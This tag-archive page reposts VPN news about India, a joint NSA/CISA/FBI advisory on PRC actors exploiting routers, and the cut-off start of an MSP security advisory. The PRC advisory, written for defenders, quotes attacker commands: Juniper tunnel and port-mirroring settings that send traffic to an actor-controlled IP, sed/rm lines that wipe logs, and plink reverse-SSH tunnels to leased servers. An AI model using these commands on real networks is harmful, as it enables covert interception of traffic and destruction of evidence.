Tag Archive for: Providers

What Is VPN, Why Are Some VPN Providers Terminating Their Servers In India

/in


Just a few days after ExpressVPN announced that it will remove all its servers from India in a bid to abstain from complying with the new cyber security rules promulgated by the Indian government for the VPN providers, another Virtual Private Network (VPN) service provider Surfshark joined the bandwagon.

The Dutch VPN provider is only the second company to have retracted from the country after the announcement of the new rules by the Indian Computer Emergency Response Team (CERT-In), which requires VPN providers to track the user data for a period of five years. In response, the company decided to shun its India based servers as it violated the company’s norms and seemed to “go against the core ethos of the company.”

VPN Providers, VPN, Indian government for VPN providers, Cyber security rules, new cyber security rule, Indian cyber security rules, Unsplash/Representational image

Table of Contents

What is a VPN?

A VPN or a virtual Private Network is a channel through which a private network is created virtually between the user and the webpage the user is trying to access. The VPN encrypts the data in real time and sends it to an external server, the IP address is thus changed and prevents third party apps from tracking your data and web experience.

How Does a VPN Work?

A VPN provider masks the user’s IP address by running it through highly configured remote servers. Therefore, when the user browses the internet through a VPN, the VPNs’ servers become the data source, thus concealing all your surfing, visits, downloads, messages from the parent Internet Service Provider (ISP) and other third-party applications. The connection thus hides the users’ data traffic from external access.

VPN Providers, VPN, Indian government for VPN providers, Cyber security rules, new cyber security rule, Indian cyber security rules, Unsplash/Representational image

What are the benefits of a VPN?

The VPN network protects the computers from online attacks and the users’ activities are protected even while they are using public networks. Ones’ user activity and behaviour also stays essentially hidden as companies and third-party applications are not receiving the information required to target based on their location, demography or user history. 

In addition, VPN networks not only allow access to content and information restricted in certain areas at times but also provide a safe pathway for…

Source…

People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

/in


Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system

This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.

This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.

NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.

Click here for PDF.

Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors

PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.

Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133]  or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems. 

PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.

These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.

NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.

 

Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors

Vendor                                       CVE                                  Vulnerability Type
Cisco CVE-2018-0171 Remote Code Execution
CVE-2019-15271 RCE
CVE-2019-1652 RCE
Citrix CVE-2019-19781 RCE
DrayTek CVE-2020-8515 RCE
D-Link CVE-2019-16920 RCE
Fortinet CVE-2018-13382 Authentication Bypass
MikroTik CVE-2018-14847 Authentication Bypass
Netgear CVE-2017-6862 RCE
Pulse CVE-2019-11510 Authentication Bypass
CVE-2021-22893 RCE
QNAP CVE-2019-7192 Privilege Elevation
CVE-2019-7193 Remote Inject
CVE-2019-7194 XML Routing Detour Attack
CVE-2019-7195 XML Routing Detour Attack
Zyxel CVE-2020-29583 Authentication Bypass

Telecommunications and network service provider targeting

PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.

Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts. 

Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.

Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure. 

While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:

set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
 

After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.

set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
 

PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. 

set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
 

Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.

sed -i -e ‘/<REGEX>/d’ <log filepath 1>
sed -i -e ‘/<REGEX>/d’ <log filepath 2>
sed -i -e ‘/<REGEX>/d’ <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
 

PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.

plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
 

NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:

  • Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
  • Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
  • Segment networks to limit or block lateral movement [D3-NI]. 
  • Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF]. 
  • Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA]. 
  • Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP]. 
  • Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
  • Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures. 
  • Disable external management capabilities and set up an out-of-band management network [D3-NI].
  • Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
  • Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
  • Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
  • Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM]. 
  • Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.

U.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.

U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email [email protected].

Additional References

Contact Information 

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at [email protected]. For NSA client requirements or general cybersecurity inquiries, contact [email protected]

Media Inquiries / Press Desk: 

Disclaimer of endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Appendix A: Vulnerabilities

Table 2: Information on Cisco CVE-2018-0171

 

Table 3: Information on Cisco CVE-2019-15271

                                              Cisco CVE-2019-15271                      CVSS 3.0: 8.8 (High)

Vulnerability Description 

A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
Recommended Mitigations 

  • Cisco has released free software updates that address the vulnerability described in this advisory.
  • Cisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN Router and RV042G Dual Gigabit WAN VPN Router.
  • Administrators can reduce the attack surface by disabling the Remote Management feature if there is no operational requirement to use it. Note that the feature is disabled by default.
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:

  • RV016 Multi-WAN VPN Router
  • RV042 Dual WAN VPN Router
  • RV042G Dual Gigabit WAN VPN Router
  • RV082 Dual WAN VPN Router

References 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x

 

Table 4: Information on Cisco CVE-2019-1652

 

Table 5: Information on Citrix CVE-2019-19781

                                                   Citrix CVE-2019-19781          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
Recommended Mitigations 

  • Implement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation Steps for CVE-2019-19781. 
  • If possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).
Detection Methods 

  • CISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for susceptibility to CVE-2019-19781.
  • Nmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path Traversal #1893.
  • Citrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.
  • CVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA) provides guidance on detecting and preventing web shell malware at https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.

Vulnerable Technologies and Versions 

The vulnerability affects the following Citrix product versions on all supported platforms:

  • Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24
  • NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18
  • NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13
  • NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15
  • NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12
  • Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 

References 

https://support.citrix.com/article/CTX267027

 

Table 6: Information on DrayTek CVE-2020-8515

                                                 DrayTek CVE-2020-8515          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
Recommended Mitigations 

  • Users of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware addresses this issue.
  • Disable the remote access on your router if you don’t need it.
  • Disable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so you should also temporarily disable SSL VPN until you have updated the firmware.
  • Always back up your config before doing an upgrade.
  • After upgrading, check that the web interface now shows the new firmware version.
  • Enable syslog logging for monitoring if there are abnormal events. 
Detection Methods 

  • Check that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for router admin) have been added.
  • Check if any ACL (Access Control Lists) have been altered.
Vulnerable Technologies and Versions 

  • This vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.

References 

https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html

 

Table 7: Information on D-Link CVE-2019-16920

                                                   D-Link CVE-2019-16920          CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a “PingTest” device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
Recommended Mitigations 

  • Recommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life devices should not be used.
Detection Methods 

  • HTTP packet inspection to look for arbitrary input to the “ping_test” command 
Vulnerable Technologies and Versions 

  • DIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-82

References 

https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079

 

Table 8: Information on Fortinet CVE-2018-13382

                                                     Fortinet CVE-2018-13382            CVSS 3.0: 7.5 (High)

Vulnerability Description 

An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
Recommended Mitigations 

  • Upgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or above or version 2.0.1 or above.
  • SSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).
  • Migrate SSL VPN user authentication from local to remote (LDAP or RADIUS).
  • Totally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI commands: config vpn ssl settings, unset source-interface, end.
Detection Methods 

  • HTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN password modification

Vulnerable Technologies and Versions

This vulnerability affects the following products: 

  • Fortinet FortiOS 6.0.0 to 6.0.4
  • Fortinet FortiOS 5.6.0 to 5.6.8
  • Fortinet FortiOS 5.4.1 to 5.4.10
  • Fortinet FortiProxy 2.0.0
  • Fortinet FortiProxy 1.2.8 and below
  • Fortinet FortiProxy 1.1.6 and below
  • Fortinet FortiProxy 1.0.7 and below

FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.

References 

https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231

 

Table 9: Information on Mikrotik CVE-2018-14847

                                            Mikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)

Vulnerability Description 

MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
Recommended Mitigations 

  • Upgrade WinBox and RouterOS and change passwords
  • Firewall the WinBox port from the public interface and from untrusted networks
Detection Methods 

  • Use export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS proxy settings and scripts.

Vulnerable Technologies and Versions 

This vulnerability affected the following MikroTik products:

  • All bugfix releases from 6.30.1 to 6.40.7
  • All current releases from 6.29 to 6.42
  • All RC releases from 6.29rc1 to 6.43rc3

References

https://blog.mikrotik.com/security/winbox-vulnerability.html

 

Table 10: Information on Netgear CVE-2017-6862

 

Table 11: Information on Pulse CVE-2019-11510

                                              Pulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)

Vulnerability Description 

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. 
Recommended Mitigations 

  • Upgrade to the latest Pulse Secure VPN.
  • Stay alert to any scheduled tasks or unknown files/executables.
  • Create detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system files.

Detection Methods 

  • CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
  • Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.

Vulnerable Technologies and Versions 

This vulnerability affects the following Pulse Connect Secure products:

  • 9.0R1 to 9.0R3.3
  • 8.3R1 to 8.3R7
  • 8.2R1 to 8.2R12

References 

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/

 

Table 12: Information on Pulse CVE-2021-22893

 

Table 13: Information on QNAP CVE-2019-7192

                                                  QNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later 
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 14: Information on QNAP CVE- 2019-7193

 

Table 15: Information on QNAP CVE-2019-7194

                                               QNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 16: Information on QNAP CVE-2019-7195

                                             QNAP CVE-2019-7195                   CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 17: Information on Zyxel CVE-2020-29583

 

Source…

Protecting Against Cyber Threats to Managed Service Providers and their Customers

/in


Tactical actions for MSPs and their customers to take today:
• Identify and disable accounts that are no longer in use.
• Enforce MFA on MSP accounts that access the customer environment and monitor for unexplained failed authentication.
• Ensure MSP-customer contracts transparently identify ownership of ICT security roles and responsibilities.

The cybersecurity authorities of the United Kingdom (NCSC-UK), Australia (ACSC), Canada (CCCS), New Zealand (NCSC-NZ), and the United States (CISA), (NSA), (FBI) are aware of recent reports that observe an increase in malicious cyber activity targeting managed service providers (MSPs) and expect this trend to continue.[1] This joint Cybersecurity Advisory (CSA) provides actions MSPs and their customers can take to reduce their risk of falling victim to a cyber intrusion. This advisory describes cybersecurity best practices for information and communications technology (ICT) services and functions, focusing on guidance that enables transparent discussions between MSPs and their customers on securing sensitive data. Organizations should implement these guidelines as appropriate to their unique environments, in accordance with their specific security needs, and in compliance with applicable regulations. MSP customers should verify that the contractual arrangements with their provider include cybersecurity measures in line with their particular security requirements.

The guidance provided in this advisory is specifically tailored for both MSPs and their customers and is the result of a collaborative effort from the United Kingdom National Cyber Security Centre (NCSC-UK), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the United States’ Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI) with contributions from industry members of the Joint Cyber Defense Collaborative (JCDC). Organizations should read this advisory in conjunction with NCSC-UK guidance on actions to take when the cyber threat is heightened, CCCS guidance on Cyber Security Considerations for Consumers of Managed Services, and CISA guidance provided on the Shields Up and Shields Up Technical Guidance webpages.

Managed Service Providers

This advisory defines MSPs as entities that deliver, operate, or manage ICT services and functions for their customers via a contractual arrangement, such as a service level agreement. In addition to offering their own services, an MSP may offer services in conjunction with those of other providers. Offerings may include platform, software, and IT infrastructure services; business process and support functions; and cybersecurity services. MSPs typically manage these services and functions in their customer’s network environment—either on the customer’s premises or hosted in the MSP’s data center. Note: this advisory does not address guidance on cloud service providers (CSPs)—providers who handle the ICT needs of their customers via cloud services such as Software-as-a-Service, Platform-as-a-Service, and Infrastructure-as-a-Service; however, MSPs may offer these services as well. (See Appendix for additional definitions.)

MSPs provide services that usually require both trusted network connectivity and privileged access to and from customer systems. Many organizations—ranging from large critical infrastructure organizations to small- and mid-sized businesses—use MSPs to manage ICT systems, store data, or support sensitive processes. Many organizations make use of MSPs to scale and support network environments and processes without expanding their internal staff or having to develop the capabilities internally. 

Threat Actors Targeting MSP Access to Customer Networks

Whether the customer’s network environment is on premises or externally hosted, threat actors can use a vulnerable MSP as an initial access vector to multiple victim networks, with globally cascading effects. The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities expect malicious cyber actors—including state-sponsored advanced persistent threat (APT) groups—to step up their targeting of MSPs in their efforts to exploit provider-customer network trust relationships. For example, threat actors successfully compromising an MSP could enable follow-on activity—such as ransomware and cyber espionage—against the MSP as well as across the MSP’s customer base.

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities have previously issued general guidance for MSPs and their customers.[2],[3],[4],[5],[6],[7],[8] This advisory provides specific guidance to enable transparent, well-informed discussions between MSPs and their customers that center on securing sensitive information and data. These discussions should result in a re-evaluation of security processes and contractual commitments to accommodate customer risk tolerance. A shared commitment to security will reduce risk for both MSPs and their customers, as well as the global ICT community. 

Download the Joint Cybersecurity Advisory: Protecting Against Cyber Threats to Managed Service Providers and their Customers (pdf, 697kb).

Recommendations 

MSPs and their Customers

The UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities recommend MSPs and their customers implement the baseline security measures and operational controls listed in this section. Additionally, customers should ensure their contractual arrangements specify that their MSP implements these measures and controls.

Prevent initial compromise. 

In their efforts to compromise MSPs, malicious cyber actors exploit vulnerable devices and internet-facing services, conduct brute force attacks, and use phishing techniques. MSPs and their customers should ensure they are mitigating these attack methods. Useful mitigation resources on initial compromise attack methods are listed below:

  • Improve security of vulnerable devices.
  • Protect internet-facing services.
  • Defend against brute force and password spraying.
  • Defend against phishing.

Enable/improve monitoring and logging processes. 

It can be months before incidents are detected, so UK, Australian, Canadian, New Zealand, and U.S. cybersecurity authorities recommend all organizations store their most important logs for at least six months. Whether through a comprehensive security information and event management (SIEM) solution or discrete logging tools, implement and maintain a segregated logging regime to detect threats to networks. Organizations can refer to the following NCSC-UK guidance on the appropriate data to collect for security purposes and when to use it: What exactly should we be logging? Additionally, all organizations—whether through contractual arrangements with an MSP or on their own—should implement endpoint detection and network defense monitoring capabilities in addition to using application allowlisting/denylisting. 

  • MSPs should log the delivery infrastructure activities used to provide services to the customer. MSPs should also log both internal and customer network activity, as appropriate and contractually agreed upon. 
  • Customers should enable effective monitoring and logging of their systems. If customers choose to engage an MSP to perform monitoring and logging, they should ensure that their contractual arrangements require their MSP to:
    • Implement comprehensive security event management that enables appropriate monitoring and logging of provider-managed customer systems; 
    • Provide visibility—as specified in the contractual arrangement—to customers of logging activities, including provider’s presence, activities, and connections to the customer networks (Note: customers should ensure that MSP accounts are properly monitored and audited.); and
    • Notify customer of confirmed or suspected security events and incidents occurring on the provider’s infrastructure and administrative networks, and send these to a security operations center (SOC) for analysis and triage. 

Enforce multifactor authentication (MFA). 

Organizations should secure remote access applications and enforce MFA where possible to harden the infrastructure that enables access to networks and systems.[9],[10] Note: Russian state-sponsored APT actors have recently demonstrated the ability to exploit default MFA protocols; organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.[11

